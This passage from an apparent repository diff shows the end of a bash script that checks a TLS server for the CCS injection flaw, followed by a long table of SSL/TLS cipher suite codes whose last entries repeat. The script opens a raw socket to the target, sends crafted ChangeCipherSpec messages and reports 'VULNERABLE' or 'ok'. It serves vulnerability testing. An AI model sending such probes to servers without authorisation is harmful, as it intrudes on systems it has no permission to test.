PORT=443 # unless otherwise auto-determined, see below
|
||||
NODE="$1"
|
||||
|
||||
# strip "https", supposed it was supplied additionally
|
||||
echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
|
||||
|
||||
# strip trailing urlpath
|
||||
NODE=`echo $NODE | sed -e 's/\/.*$//'`
|
||||
|
||||
# determine port, supposed it was supplied additionally
|
||||
echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed
|
||||
's/\:.*$//'`
|
||||
}
|
||||
|
||||
socksend() {
|
||||
data=`echo $1 | sed 's/tls_version/'"$2"'/g'`
|
||||
echo "\"$data\""
|
||||
echo -en "$data" >&5 || return 1
|
||||
sleep $SLEEP
|
||||
return 0
|
||||
}
|
||||
|
||||
sockread()
|
||||
{
|
||||
reply=`dd bs=$1 count=1 <&5 2>/dev/null`
|
||||
}
|
||||
|
||||
ok_ids(){
|
||||
echo
|
||||
tput bold; tput setaf 2; echo "ok -- something resetted our ccs packets"; tput sgr0
|
||||
echo
|
||||
exit 0
|
||||
}
|
||||
|
||||
|
||||
#### main
|
||||
|
||||
parse_hn_port "$1"
|
||||
|
||||
if ! exec 5<> /dev/tcp/$NODE/$PORT; then
|
||||
echo "`basename $0`: unable to connect to $NODE:$PORT"
|
||||
exit 2
|
||||
fi
|
||||
# socket is now open with fd 5
|
||||
|
||||
|
||||
echo "##### sending client hello:"
|
||||
socksend "$msg" $TLSV
|
||||
|
||||
sockread 5000
|
||||
echo -e "\n##### server hello\c"
|
||||
if test $DEBUG ; then
|
||||
echo ":"
|
||||
echo -e "$reply" | xxd -c32 | head -20
|
||||
echo "[...]"
|
||||
echo
|
||||
fi
|
||||
|
||||
echo "##### sending ccs injection with TLS version $TLSV:"
|
||||
socksend "$ccs_message" $TLSV || ok_ids
|
||||
sleep 1
|
||||
socksend "$ccs_message" $TLSV || ok_ids
|
||||
|
||||
sockread 65534
|
||||
echo
|
||||
echo "###### reply: "
|
||||
echo -e "$reply" | xxd -c32
|
||||
echo
|
||||
|
||||
reply_sanitized=`echo -e "$reply" | xxd -p | tr -cd '[:print:]' | sed 's/^..........//'`
|
||||
test $DEBUG || echo $reply_sanitized
|
||||
|
||||
lines=`echo -e "$reply" | xxd -c32 | wc -l`
|
||||
test $DEBUG || echo $lines
|
||||
|
||||
if [ "$lines" -gt 1 ] || [ "$reply_sanitized" == "0a" ] ;then
|
||||
tput bold; tput setaf 2; echo "ok"; tput sgr0
|
||||
ret=0
|
||||
else
|
||||
tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
|
||||
ret=1
|
||||
fi
|
||||
|
||||
echo
|
||||
exit $ret
|
||||
|
||||
|
||||
# vim:tw=100:ts=5:sw=5
|
||||
# $Id: ccs-injection.sh,v 1.3 2014/06/14 21:44:42 dirkw Exp $
|
|
@ -0,0 +1,362 @@
|
|||
0x010080 SSL_CK_RC4_128_WITH_MD5
|
||||
0x020080 SSL_CK_RC4_128_EXPORT40_WITH_MD5
|
||||
0x030080 SSL_CK_RC2_128_CBC_WITH_MD5
|
||||
0x040080 SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
|
||||
0x050080 SSL_CK_IDEA_128_CBC_WITH_MD5
|
||||
0x060040 SSL_CK_DES_64_CBC_WITH_MD5
|
||||
0x0700C0 SSL_CK_DES_192_EDE3_CBC_WITH_MD5
|
||||
0x080080 SSL_CK_RC4_64_WITH_MD5
|
||||
0x00 TLS_NULL_WITH_NULL_NULL
|
||||
0x01 TLS_RSA_WITH_NULL_MD5
|
||||
0x02 TLS_RSA_WITH_NULL_SHA
|
||||
0x03 TLS_RSA_EXPORT_WITH_RC4_40_MD5
|
||||
0x04 TLS_RSA_WITH_RC4_128_MD5
|
||||
0x05 TLS_RSA_WITH_RC4_128_SHA
|
||||
0x06 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
|
||||
0x07 TLS_RSA_WITH_IDEA_CBC_SHA
|
||||
0x08 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x09 TLS_RSA_WITH_DES_CBC_SHA
|
||||
0x0A TLS_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0x0B TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x0C TLS_DH_DSS_WITH_DES_CBC_SHA
|
||||
0x0D TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA
|
||||
0x0E TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x0F TLS_DH_RSA_WITH_DES_CBC_SHA
|
||||
0x10 TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0x11 TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x12 TLS_DHE_DSS_WITH_DES_CBC_SHA
|
||||
0x13 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
|
||||
0x14 TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x15 TLS_DHE_RSA_WITH_DES_CBC_SHA
|
||||
0x16 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0x17 TLS_DH_anon_EXPORT_WITH_RC4_40_MD5
|
||||
0x18 TLS_DH_anon_WITH_RC4_128_MD5
|
||||
0x19 TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|
||||
0x1A TLS_DH_anon_WITH_DES_CBC_SHA
|
||||
0x1B TLS_DH_anon_WITH_3DES_EDE_CBC_SHA
|
||||
0x1C SSL_FORTEZZA_KEA_WITH_NULL_SHA
|
||||
0x1D SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA
|
||||
0x1E TLS_KRB5_WITH_DES_CBC_SHA
|
||||
0x1F TLS_KRB5_WITH_3DES_EDE_CBC_SHA
|
||||
0x20 TLS_KRB5_WITH_RC4_128_SHA
|
||||
0x21 TLS_KRB5_WITH_IDEA_CBC_SHA
|
||||
0x22 TLS_KRB5_WITH_DES_CBC_MD5
|
||||
0x23 TLS_KRB5_WITH_3DES_EDE_CBC_MD5
|
||||
0x24 TLS_KRB5_WITH_RC4_128_MD5
|
||||
0x25 TLS_KRB5_WITH_IDEA_CBC_MD5
|
||||
0x26 TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA
|
||||
0x27 TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA
|
||||
0x28 TLS_KRB5_EXPORT_WITH_RC4_40_SHA
|
||||
0x29 TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5
|
||||
0x2A TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5
|
||||
0x2B TLS_KRB5_EXPORT_WITH_RC4_40_MD5
|
||||
0x2C TLS_PSK_WITH_NULL_SHA
|
||||
0x2D TLS_DHE_PSK_WITH_NULL_SHA
|
||||
0x2E TLS_RSA_PSK_WITH_NULL_SHA
|
||||
0x2F TLS_RSA_WITH_AES_128_CBC_SHA
|
||||
0x30 TLS_DH_DSS_WITH_AES_128_CBC_SHA
|
||||
0x31 TLS_DH_RSA_WITH_AES_128_CBC_SHA
|
||||
0x32 TLS_DHE_DSS_WITH_AES_128_CBC_SHA
|
||||
0x33 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|
||||
0x34 TLS_DH_anon_WITH_AES_128_CBC_SHA
|
||||
0x35 TLS_RSA_WITH_AES_256_CBC_SHA
|
||||
0x36 TLS_DH_DSS_WITH_AES_256_CBC_SHA
|
||||
0x37 TLS_DH_RSA_WITH_AES_256_CBC_SHA
|
||||
0x38 TLS_DHE_DSS_WITH_AES_256_CBC_SHA
|
||||
0x39 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|
||||
0x3A TLS_DH_anon_WITH_AES_256_CBC_SHA
|
||||
0x3B TLS_RSA_WITH_NULL_SHA256
|
||||
0x3C TLS_RSA_WITH_AES_128_CBC_SHA256
|
||||
0x3D TLS_RSA_WITH_AES_256_CBC_SHA256
|
||||
0x3E TLS_DH_DSS_WITH_AES_128_CBC_SHA256
|
||||
0x3F TLS_DH_RSA_WITH_AES_128_CBC_SHA256
|
||||
0x40 TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
|
||||
0x41 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x42 TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x43 TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x44 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x45 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x46 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
|
||||
0x60 TLS_RSA_EXPORT1024_WITH_RC4_56_MD5
|
||||
0x61 TLS_RSA_EXPORT1024_WITH_RC2_56_MD5
|
||||
0x62 TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
|
||||
0x63 TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA
|
||||
0x64 TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
|
||||
0x65 TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA
|
||||
0x66 TLS_DHE_DSS_WITH_RC4_128_SHA
|
||||
0x67 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
|
||||
0x68 TLS_DH_DSS_WITH_AES_256_CBC_SHA256
|
||||
0x69 TLS_DH_RSA_WITH_AES_256_CBC_SHA256
|
||||
0x6A TLS_DHE_DSS_WITH_AES_256_CBC_SHA256
|
||||
0x6B TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
|
||||
0x6C TLS_DH_anon_WITH_AES_128_CBC_SHA256
|
||||
0x6D TLS_DH_anon_WITH_AES_256_CBC_SHA256
|
||||
0x80 TLS_GOSTR341094_WITH_28147_CNT_IMIT
|
||||
0x81 TLS_GOSTR341001_WITH_28147_CNT_IMIT
|
||||
0x82 TLS_GOSTR341094_WITH_NULL_GOSTR3411
|
||||
0x83 TLS_GOSTR341001_WITH_NULL_GOSTR3411
|
||||
0x84 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x85 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x86 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x87 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x88 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x89 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA
|
||||
0x8A TLS_PSK_WITH_RC4_128_SHA
|
||||
0x8B TLS_PSK_WITH_3DES_EDE_CBC_SHA
|
||||
0x8C TLS_PSK_WITH_AES_128_CBC_SHA
|
||||
0x8D TLS_PSK_WITH_AES_256_CBC_SHA
|
||||
0x8E TLS_DHE_PSK_WITH_RC4_128_SHA
|
||||
0x8F TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA
|
||||
0x90 TLS_DHE_PSK_WITH_AES_128_CBC_SHA
|
||||
0x91 TLS_DHE_PSK_WITH_AES_256_CBC_SHA
|
||||
0x92 TLS_RSA_PSK_WITH_RC4_128_SHA
|
||||
0x93 TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA
|
||||
0x94 TLS_RSA_PSK_WITH_AES_128_CBC_SHA
|
||||
0x95 TLS_RSA_PSK_WITH_AES_256_CBC_SHA
|
||||
0x96 TLS_RSA_WITH_SEED_CBC_SHA
|
||||
0x97 TLS_DH_DSS_WITH_SEED_CBC_SHA
|
||||
0x98 TLS_DH_RSA_WITH_SEED_CBC_SHA
|
||||
0x99 TLS_DHE_DSS_WITH_SEED_CBC_SHA
|
||||
0x9A TLS_DHE_RSA_WITH_SEED_CBC_SHA
|
||||
0x9B TLS_DH_anon_WITH_SEED_CBC_SHA
|
||||
0x9C TLS_RSA_WITH_AES_128_GCM_SHA256
|
||||
0x9D TLS_RSA_WITH_AES_256_GCM_SHA384
|
||||
0x9E TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
|
||||
0x9F TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|
||||
0xA0 TLS_DH_RSA_WITH_AES_128_GCM_SHA256
|
||||
0xA1 TLS_DH_RSA_WITH_AES_256_GCM_SHA384
|
||||
0xA2 TLS_DHE_DSS_WITH_AES_128_GCM_SHA256
|
||||
0xA3 TLS_DHE_DSS_WITH_AES_256_GCM_SHA384
|
||||
0xA4 TLS_DH_DSS_WITH_AES_128_GCM_SHA256
|
||||
0xA5 TLS_DH_DSS_WITH_AES_256_GCM_SHA384
|
||||
0xA6 TLS_DH_anon_WITH_AES_128_GCM_SHA256
|
||||
0xA7 TLS_DH_anon_WITH_AES_256_GCM_SHA384
|
||||
0xA8 TLS_PSK_WITH_AES_128_GCM_SHA256
|
||||
0xA9 TLS_PSK_WITH_AES_256_GCM_SHA384
|
||||
0xAA TLS_DHE_PSK_WITH_AES_128_GCM_SHA256
|
||||
0xAB TLS_DHE_PSK_WITH_AES_256_GCM_SHA384
|
||||
0xAC TLS_RSA_PSK_WITH_AES_128_GCM_SHA256
|
||||
0xAD TLS_RSA_PSK_WITH_AES_256_GCM_SHA384
|
||||
0xAE TLS_PSK_WITH_AES_128_CBC_SHA256
|
||||
0xAF TLS_PSK_WITH_AES_256_CBC_SHA384
|
||||
0xB0 TLS_PSK_WITH_NULL_SHA256
|
||||
0xB1 TLS_PSK_WITH_NULL_SHA384
|
||||
0xB2 TLS_DHE_PSK_WITH_AES_128_CBC_SHA256
|
||||
0xB3 TLS_DHE_PSK_WITH_AES_256_CBC_SHA384
|
||||
0xB4 TLS_DHE_PSK_WITH_NULL_SHA256
|
||||
0xB5 TLS_DHE_PSK_WITH_NULL_SHA384
|
||||
0xB6 TLS_RSA_PSK_WITH_AES_128_CBC_SHA256
|
||||
0xB7 TLS_RSA_PSK_WITH_AES_256_CBC_SHA384
|
||||
0xB8 TLS_RSA_PSK_WITH_NULL_SHA256
|
||||
0xB9 TLS_RSA_PSK_WITH_NULL_SHA384
|
||||
0xBA TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xBB TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xBC TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xBD TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xBE TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xBF TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC0 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xC1 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xC2 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xC3 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xC4 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xC5 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256
|
||||
0xFF TLS_EMPTY_RENEGOTIATION_INFO_SCSV
|
||||
0xC001 TLS_ECDH_ECDSA_WITH_NULL_SHA
|
||||
0xC002 TLS_ECDH_ECDSA_WITH_RC4_128_SHA
|
||||
0xC003 TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC004 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
|
||||
0xC005 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
|
||||
0xC006 TLS_ECDHE_ECDSA_WITH_NULL_SHA
|
||||
0xC007 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
|
||||
0xC008 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC009 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
|
||||
0xC00A TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
|
||||
0xC00B TLS_ECDH_RSA_WITH_NULL_SHA
|
||||
0xC00C TLS_ECDH_RSA_WITH_RC4_128_SHA
|
||||
0xC00D TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC00E TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
|
||||
0xC00F TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
|
||||
0xC010 TLS_ECDHE_RSA_WITH_NULL_SHA
|
||||
0xC011 TLS_ECDHE_RSA_WITH_RC4_128_SHA
|
||||
0xC012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
|
||||
0xC014 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
|
||||
0xC015 TLS_ECDH_anon_WITH_NULL_SHA
|
||||
0xC016 TLS_ECDH_anon_WITH_RC4_128_SHA
|
||||
0xC017 TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA
|
||||
0xC018 TLS_ECDH_anon_WITH_AES_128_CBC_SHA
|
||||
0xC019 TLS_ECDH_anon_WITH_AES_256_CBC_SHA
|
||||
0xC01A TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC01B TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
|
||||
0xC01C TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
|
||||
0xC01D TLS_SRP_SHA_WITH_AES_128_CBC_SHA
|
||||
0xC01E TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
|
||||
0xC01F TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
|
||||
0xC020 TLS_SRP_SHA_WITH_AES_256_CBC_SHA
|
||||
0xC021 TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
|
||||
0xC022 TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
|
||||
0xC023 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
|
||||
0xC024 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
|
||||
0xC025 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256
|
||||
0xC026 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384
|
||||
0xC027 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
|
||||
0xC028 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
|
||||
0xC029 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256
|
||||
0xC02A TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384
|
||||
0xC02B TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
|
||||
0xC02C TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
|
||||
0xC02D TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256
|
||||
0xC02E TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384
|
||||
0xC02F TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
|
||||
0xC030 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
|
||||
0xC031 TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256
|
||||
0xC032 TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384
|
||||
0xC033 TLS_ECDHE_PSK_WITH_RC4_128_SHA
|
||||
0xC034 TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA
|
||||
0xC035 TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA
|
||||
0xC036 TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA
|
||||
0xC037 TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256
|
||||
0xC038 TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384
|
||||
0xC039 TLS_ECDHE_PSK_WITH_NULL_SHA
|
||||
0xC03A TLS_ECDHE_PSK_WITH_NULL_SHA256
|
||||
0xC03B TLS_ECDHE_PSK_WITH_NULL_SHA384
|
||||
0xC03C TLS_RSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC03D TLS_RSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC03E TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256
|
||||
0xC03F TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384
|
||||
0xC040 TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC041 TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC042 TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256
|
||||
0xC043 TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384
|
||||
0xC044 TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC045 TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC046 TLS_DH_anon_WITH_ARIA_128_CBC_SHA256
|
||||
0xC047 TLS_DH_anon_WITH_ARIA_256_CBC_SHA384
|
||||
0xC048 TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC049 TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC04A TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC04B TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC04C TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC04D TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC04E TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256
|
||||
0xC04F TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384
|
||||
0xC050 TLS_RSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC051 TLS_RSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC052 TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC053 TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC054 TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC055 TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC056 TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256
|
||||
0xC057 TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384
|
||||
0xC058 TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256
|
||||
0xC059 TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384
|
||||
0xC05A TLS_DH_anon_WITH_ARIA_128_GCM_SHA256
|
||||
0xC05B TLS_DH_anon_WITH_ARIA_256_GCM_SHA384
|
||||
0xC05C TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC05D TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC05E TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC05F TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC060 TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC061 TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC062 TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256
|
||||
0xC063 TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384
|
||||
0xC064 TLS_PSK_WITH_ARIA_128_CBC_SHA256
|
||||
0xC065 TLS_PSK_WITH_ARIA_256_CBC_SHA384
|
||||
0xC066 TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256
|
||||
0xC067 TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384
|
||||
0xC068 TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256
|
||||
0xC069 TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384
|
||||
0xC06A TLS_PSK_WITH_ARIA_128_GCM_SHA256
|
||||
0xC06B TLS_PSK_WITH_ARIA_256_GCM_SHA384
|
||||
0xC06C TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256
|
||||
0xC06D TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384
|
||||
0xC06E TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256
|
||||
0xC06F TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384
|
||||
0xC070 TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256
|
||||
0xC071 TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384
|
||||
0xC072 TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC073 TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC074 TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC075 TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC076 TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC077 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC078 TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC079 TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC07A TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC07B TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC07C TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC07D TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC07E TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC07F TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC080 TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC081 TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC082 TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC083 TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC084 TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC085 TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC086 TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC087 TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC088 TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC089 TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC08A TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC08B TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC08C TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC08D TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC08E TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC08F TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC090 TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC091 TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC092 TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256
|
||||
0xC093 TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384
|
||||
0xC094 TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC095 TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC096 TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC097 TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC098 TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC099 TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC09A TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256
|
||||
0xC09B TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384
|
||||
0xC09C TLS_RSA_WITH_AES_128_CCM
|
||||
0xC09D TLS_RSA_WITH_AES_256_CCM
|
||||
0xC09E TLS_DHE_RSA_WITH_AES_128_CCM
|
||||
0xC09F TLS_DHE_RSA_WITH_AES_256_CCM
|
||||
0xC0A0 TLS_RSA_WITH_AES_128_CCM_8
|
||||
0xC0A1 TLS_RSA_WITH_AES_256_CCM_8
|
||||
0xC0A2 TLS_DHE_RSA_WITH_AES_128_CCM_8
|
||||
0xC0A3 TLS_DHE_RSA_WITH_AES_256_CCM_8
|
||||
0xC0A4 TLS_PSK_WITH_AES_128_CCM
|
||||
0xC0A5 TLS_PSK_WITH_AES_256_CCM
|
||||
0xC0A6 TLS_DHE_PSK_WITH_AES_128_CCM
|
||||
0xC0A7 TLS_DHE_PSK_WITH_AES_256_CCM
|
||||
0xC0A8 TLS_PSK_WITH_AES_128_CCM_8
|
||||
0xC0A9 TLS_PSK_WITH_AES_256_CCM_8
|
||||
0xC0AA TLS_PSK_DHE_WITH_AES_128_CCM_8
|
||||
0xC0AB TLS_PSK_DHE_WITH_AES_256_CCM_8
|
||||
0xC09C TLS_RSA_WITH_AES_128_CCM
|
||||
0xC09D TLS_RSA_WITH_AES_256_CCM
|
||||
0xC09E TLS_DHE_RSA_WITH_AES_128_CCM
|
||||
0xC09F TLS_DHE_RSA_WITH_AES_256_CCM
|
||||
0xC0A0 TLS_RSA_WITH_AES_128_CCM_8
|
||||
